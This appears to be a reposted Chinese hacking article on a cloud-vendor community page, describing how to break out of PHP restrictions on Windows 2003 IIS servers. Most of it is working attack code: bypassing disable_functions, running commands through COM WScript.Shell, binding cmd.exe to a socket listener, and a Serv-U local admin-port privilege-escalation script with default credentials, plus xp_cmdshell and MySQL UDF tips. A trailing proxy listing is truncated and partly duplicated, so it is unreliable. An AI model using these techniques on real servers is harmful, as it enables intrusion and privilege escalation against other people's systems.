突破Windows 2003 PHP伺服器的新思路

來源:互聯網
上載者:User

  從WIN2000到WIN XP, 再到WIN2003, MS IIS伺服器安全性的提高是顯而易見的。 在WIN2000中, 一個普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也無法用system() 等函數執行系統命令, 但是我們還能用com()函數進行突破;到WIN 2003,即使IIS 和PHP都是預設安裝,你用system(), com()也可能拿它沒轍。這時候你就不得不使用一些新的方法來進行突破了。
 
  1、disable_functions的突破

  在php -4.0.1以上的版本,php.ini裡引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。比如在php.ini裡加上disable_functions = passthru exec system popen 那麼在執行這些函數的時候將會提示Warning: system() has been disabled for security reasons,同時程式終止運行。但是也不是沒有辦法執行系統命令了。因為php採用了很多perl的特性,比如還可以用(`)來執行命令,範例程式碼如下:

  <?$output = `ls -al`;echo "<pre>$output</pre>";?>

  據說這個只有設成safe_mode為on才能避免,但上次我在一台國外的伺服器上使用的時候還是失敗了,人並不是什麼時候都能那麼走運的:)

  2、dl()函數的應用

  當任何PHP的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用於safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調用W32api 函數,可惜這個擴充已被移動到 PECL 庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊裡的例子:

  // 載入此擴充

  dl("php_w32api.dll");

  // 註冊 GetTickCount 函數,來自 kernel32.dll

  w32api_register_function("kernel32.dll",

  "GetTickCount",

  "long");

  // 註冊 MessageBoxA 函數,來自 User32.dll

  w32api_register_function("User32.dll",

  "MessageBoxA",

  "long");

  // 取得開機時間資訊

  $ticks = GetTickCount();

  // 轉換為易於理解的文本

  $secs = floor($ticks / 1000);

  $mins = floor($secs / 60);

  $hours = floor($mins / 60);

  $str = sprintf("You have been using your computer for:".

  "\r\n %d Milliseconds, or \r\n %d Seconds".

  "or \r\n %d mins or\r\n %d hours %d mins.",

  $ticks,

  $secs,

  $mins,

  $hours,

  $mins - ($hours*60));

  // 顯示一個訊息對話方塊,只有一個 OK 按鈕和上面的開機時間文本

  MessageBoxA(NULL,

  $str,

  "Uptime Information",

  MB_OK);

  ?>

  可惜我還沒有理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導讀者。

  3、COM 和 .Net(Windows)函數的應用

  COM(Component Object Model,元件物件模型)是微軟開發的軟體規範,它用於開發物件導向的、編譯好的軟體組件,它允許把軟體抽象成為二進位的組件,主要運用於windows平台。

  PHP 的 Windows 版本已經內建該擴充模組的支援。無需載入任何附加擴充庫即可使用COM函數。它的使用方法類似於C++或Java中類的建立的文法,並把COM的類名作為參數傳遞到建構函式。例如使用在PHP中調用“WScript.Shell”執行系統命令:

  $cmd=” E:/cert/admin/psexec.exe”;

  if($com=new COM("WScript.Shell")) echo "yes";

  if(!$cmd1=$com->exec($cmd))

  {

  echo "can not exec()";

  }

  if(!$cmd2=$cmd1->stdout())

  {

  echo "can not stdout()";

  }

  if(!$cmd3=$cmd2->readall())

  {

  echo "can not readall()";

  }

  echo $cmd3;

  ?>

  圖1是我寫的一個執行psexec.exe的一個例子。

  這段代碼與ASP的的意思是一模一樣的,當然,你也可以像ASP那樣調用“ADODB.Connection”,利用這個組件結合jet2溢出漏洞,可能能夠在PHP Saft mode=ON下拿到一個Shell。

  //create the database connection

  $conn = new COM("ADODB.Connection");

  $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");

  $conn->Open($dsn);

  //pull the data through SQL string

  $rs = $conn->Execute("select clients from web");

  …..

  ?>

  .Net 函數只能運行在 PHP 5上,當然,它需要 “.Net runtime”的支援,而且這的PHP的一個實驗性模組,功能還未齊全,所以在這就不討論了。

  4、Java()函數的應用

  該方法適用於safe mode=on。要使用JAVA模組伺服器必須事先安裝Java虛擬機器,而且在PHP安裝配置的時候開啟了with-java的選項,代碼如下:

  [JAVA]

  ;這是到php_java.jar的路徑

  ;java.class.path = .\php_java.jar

  ;JDK的路徑

  ;Java.home = f:\jdk1.3.0

  ;到虛擬機器的路徑

  ;Java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll

  同COM一樣,使用Java建立類(不僅僅是JavaBeans)只需把JAVA的類名作為參數傳遞到建構函式。以下是手冊裡邊的一個例子:

  // This example is only intended to be run as a CGI.

  $frame = new Java('java.awt.Frame', 'PHP');

  $button = new Java('java.awt.Button', 'Hello Java World!');

  $frame->add('North', $button);

  $frame->validate();

  $frame->pack();

  $frame->visible = True;

  $thread = new Java('java.lang.Thread');

  $thread->sleep(10000);

  $frame->dispose();

  ?>

  可惜能真正支援JAVA的PHP伺服器並不多見,所以在這也不多討論了。

  5、socket()函數的應用

  socket 是PHP中功能極為強大的一個模組,如果你使用進階的、抽象的介面(由fsockopen()和psockopen函數開啟的socket),是不需要開啟“php_sockets.dll”的。但是如果要使用完整的socket函數塊,就必須在php.ini這樣設定:

  ;Windows Extensions

  ;Note that MySQL and ODBC support is now built in, so no dll is needed for it.

  ……..

  ;去掉以下一句最前邊的分號

  ;extension=php_sockets.dll

  使用PHP的socket函數塊可以實現連接埠轉寄/重新導向、資料包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 還可以用它構造TCP/UDP伺服器, 同時, 我覺得它也是突破伺服器安全性原則的一個最好的辦法。以下便是一個在伺服器上開啟連接埠構造TCP伺服器的例子,你可以用它來捆綁上伺服器的cmd.exe:

  //在伺服器上構造TCP服務

  //該例子需要php_sockets.dll的支援

  //執行後便可使用” telnet 127.0.0.1 1020”串連

  error_reporting(E_ALL);

  /* Allow the script to hang around waiting for connections. */

  set_time_limit(0);

  /* Turn on implicit output flushing so we see what we're getting

  * as it comes in. */

  ob_implicit_flush();

  //在伺服器上綁定IP和連接埠

  $address = '127.0.0.1';

  $port = 1020;

  if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {

  echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";

  }

  if (($ret = socket_bind($sock, $address, $port)) < 0) {

  echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";

  }

  if (($ret = socket_listen($sock, 5)) < 0) {

  echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";

  }

  do {

  if (($msgsock = socket_accept($sock)) < 0) {

  echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";

  break;

  }

  /* Send instructions. */

  $msg = "\nWelcome to the PHP Test Server. \n" .

  "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";

  socket_write($msgsock, $msg, strlen($msg));

  do {

  if (false === socket_recv($msgsock, $buf , 1024, 0)) {

  echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";

  break 2;

  }

  if (!$buf = trim($buf)) {

  continue;

  }

  if ($buf == 'quit') {

  break;

  }

  if ($buf == 'shutdown') {

  socket_close($msgsock);

  break 2;

  }

  $talkback = "PHP: You said '$buf'.\n";

  socket_write($msgsock, $talkback, strlen($talkback));

  echo "$buf\n";

  //以下處理接受到的buf

  /*eg:例如

  $buf=”cmd.exe /c netstat –an”;

  $pp = popen('$buf ', 'r');

  While($read = fgets($pp, 2096))

  echo $read;

  pclose($pp);

  */

  } while (true);

  socket_close($msgsock);

  } while (true);

  socket_close($sock);

  ?>

  事實上,很多主機都是沒有載入php_sockets.dll的,慶幸的是,不需要socket模組支援的“fsockopen”函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀寫本機中未對外部開放的連接埠。使用fsockopen讀寫serv-u 的本地管理連接埠43958 (注: 該連接埠無法在外部連結) 進行提權便是一個很典型的例子:

  $adminuser=” LocalAdministrator”;

  $adminpass=” #l@$ak#.lk;0@P”;

  $adminport=” 43958”;

  $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);

  if (!$fp) {

  echo "$errstr ($errno)

  \n";

  } else {

  //可以寫入$shellcode

  // fputs ($fp, $shellcode);

  fputs ($fp, "USER ".$adminuser."\r\n");

  sleep (1);

  fputs ($fp, "PASS ".$adminpass."\r\n");

  sleep (1);

  fputs ($fp, "SITE MAINTENANCE\r\n");

  sleep (1);

  fputs ($fp, "-SETUSERSETUP\r\n");

  fputs ($fp, "-IP=".$addr."\r\n");

  fputs ($fp, "-PortNo=".$ftpport."\r\n");

  fputs ($fp, "-User=".$user."\r\n");

  fputs ($fp, "-Password=".$password."\r\n");

  fputs ($fp, "-HomeDir=".$homedir."\r\n");

  fputs ($fp, "-LoginMesFile=\r\n");

  fputs ($fp, "-Disable=0\r\n");

  fputs ($fp, "-RelPaths=0\r\n");

  fputs ($fp, "-NeedSecure=0\r\n");

  fputs ($fp, "-HideHidden=0\r\n");

  fputs ($fp, "-AlwaysAllowLogin=0\r\n");

  fputs ($fp, "-ChangePassword=1\r\n");

  fputs ($fp, "-QuotaEnable=0\r\n");

  fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");

  fputs ($fp, "-SpeedLimitUp=-1\r\n");

  fputs ($fp, "-SpeedLimitDown=-1\r\n");

  fputs ($fp, "-MaxNrUsers=-1\r\n");

  fputs ($fp, "-IdleTimeOut=600\r\n");

  fputs ($fp, "-SessionTimeOut=-1\r\n");

  fputs ($fp, "-Expire=0\r\n");

  fputs ($fp, "-RatioUp=1\r\n");

  fputs ($fp, "-RatioDown=1\r\n");

  fputs ($fp, "-RatiosCredit=0\r\n");

  fputs ($fp, "-QuotaCurrent=0\r\n");

  fputs ($fp, "-QuotaMaximum=0\r\n");

  fputs ($fp, "-Maintenance=System\r\n");

  fputs ($fp, "-PasswordType=Regular\r\n");

  fputs ($fp, "-Ratios=None\r\n");

  fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");

  fputs ($fp, "QUIT\r\n");

  sleep (1);

  while (!feof($fp)) {

  echo fgets ($fp,128);

  }

  }

  ?>

  還可以利用fsockopen編寫HTTP代理,從而訪問外網或本機中無法外部存取的網站。我手上有一個完整的HTTPProxy(圖4),代碼較長。有興趣的讀者可以看看。

  6、MYSQL/MSSQL介面

  不同於Linux的是,windows下的mysql/MSSQL一般是以系統管理員身份啟動並執行,因此,只要能拿到本機SQL資料庫中的root/sa密碼,你就可以直接用PHP串連資料庫來執行系統命令。

  在Mysql中執行系統命令要利用使用者自訂函數“MySQL UDF Dynamic Library”這個漏洞。在MSSQL中只要串連上資料庫,就能直接調用“master..xp_cmdshell“擴充執行命令,許可權當然是system許可權。

  總結一下:由於系統、IIS、PHP的版本不一樣,以上提到的幾個突破方法可能會有所變化,PHP還有許多擴充功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全性原則的限制!

  後面附上proxy.php的代碼

  error_reporting(E_ALL);

  /*

  // This program is free software; you can redistribute it and/or

  // modify it under the terms of the GNU General Public License

  // as published by the Free Software Foundation; either version 2

  // of the License, or (at your option) any later version.

  //

  // This program is distributed in the hope that it will be useful,

  // but WITHOUT ANY WARRANTY; without even the implied warranty of

  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

  // GNU General Public License for more details.

  //

  // You should have received a copy of the GNU General Public License

  // along with this program; if not, write to the Free Software

  // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

  //-------------------------------------------------------------------

  // Class: PHProxy

  // Author: ultimategamer00 (Abdullah A.)

  // Last Modified: 6:28 PM 6/22/2004

  */

  function __stripslashes($str)

  {

  return get_magic_quotes_gpc() ? stripslashes($str) : $str;

  }

  if (!function_exists('str_rot13'))

  {

  function str_rot13($str)

  {

  static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',

  'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');

  return strtr($str, $alpha[0], $alpha[1]);

  }

  }

  class PHProxy

  {

  var $allowed_hosts = array();

  var $version;

  var $script_url;

  var $url;

  var $url_segments;

  var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);

  var $socket;

  var $content_type;

  var $request_headers;

  var $post_body;

  var $response_headers;

  var $response_body;

  function PHProxy($flags = 'previous')

  {

  $this->version = '0.2';

  $this->script_url = 'http'

  . (isset(

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n";

  $headers .= "Host: :\r\n";

  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";

  $headers .= "Connection: close\r\n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "Referer: \r\n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';

  if (

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n";

  $headers .= "Host: :\r\n";

  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";

  $headers .= "Connection: close\r\n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "Referer: \r\n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';

  if (



聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.